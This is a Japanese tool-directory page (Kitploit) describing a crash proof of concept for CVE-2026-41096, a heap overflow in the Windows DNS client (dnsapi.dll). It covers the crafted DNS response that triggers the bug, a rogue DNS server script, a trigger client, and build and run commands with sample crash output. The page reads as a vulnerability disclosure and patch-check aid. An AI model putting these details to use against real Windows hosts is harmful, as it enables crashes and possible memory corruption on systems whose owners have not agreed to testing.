Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-41096 — CVE-2026-41096: Windows DNS クライアントにおけるヒープオーバーフロー | Kitploit
ツール/GitHubGitHub/m0n1x90/cve-2026-41096
ペイロード生成脆弱性分析エクスプロイトファジングDNS分析バイナリエクスプロイト
GitHubm0n1x90/cve-2026-41096

CVE-2026-41096

CVE-2026-41096: Windows DNS クライアントにおけるヒープオーバーフロー

リポジトリを見る
322ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-41096 - クラッシュ PoC

DnsRawTruncateMessageForUdp() (dnsapi.dll) におけるヒープオーバーフロー。QDCOUNT=0 と大きな OPT レコードを含む巧妙に細工された DNS 応答により、切り詰めロジックが宛先ポインターを誤計算した場合に 604 バイトのヒープオーバーフローが発生します。

MSRC アドバイザリ: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41096

コンポーネント

ファイル説明
rogue_dns_server.py不正 DNS サーバー (Python 3)。すべてのクエリに対し、QDCOUNT=0 + OPT レスポンス (623 バイト) を返します。
trigger_client.cトリガークライアント (C/Win32)。不正サーバーを指す DnsQueryRaw を呼び出します。SetUnhandledExceptionFilter でクラッシュを捕捉します。

要件

攻撃者 (不正サーバー):

  • Python 3
  • Root/admin (ポート 53)

被害者 (トリガークライアント):

  • DnsCache サービスを備えた Windows OS (DnsQueryRaw が必要)
  • 脆弱性のあるバージョンの dnsapi.dll
  • Visual Studio / Windows SDK (ビルド用)

使用方法

1. 不正サーバーを起動:

root@kitploit:~
sudo python3 rogue_dns_server.py

2. トリガークライアントをビルドして実行:

root@kitploit:~
cl /W4 /O2 trigger_client.c /link ws2_32.lib
trigger_client.exe <ROGUE_DNS_IP>

3. (任意) 決定的なクラッシュを得るために Page Heap を有効化:

root@kitploit:~
gflags /p /enable trigger_client.exe /full
trigger_client.exe <ROGUE_DNS_IP>

終了コード

コード意味
0システムはパッチ済み (DNS_ERROR_BAD_PACKET が正常に返される)
1エラー (DnsQueryRaw が見つからない、ネットワーク問題など)
2クラッシュ検出 (ヒープオーバーフロー確認)

出力例

脆弱な場合 (Page Heap):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000005 at 0x00007FFD1A2B4F20
[!!] WRITE at 0x000001A33C3B1000

[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

脆弱な場合 (Page Heap なし):

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...

[!!] CRASH - Exception 0xC0000374 at 0x00007FFD1B5DXXXX
[!!] CVE-2026-41096 CONFIRMED - heap overflow triggered.

パッチ済み:

root@kitploit:~
[*] Querying rogue server 192.168.56.1:53 via DnsQueryRaw...
[*] Waiting for response...
[+] Callback: queryStatus=0x251E
[+] DNS_ERROR_BAD_PACKET - system is PATCHED.
ツールをダウンロード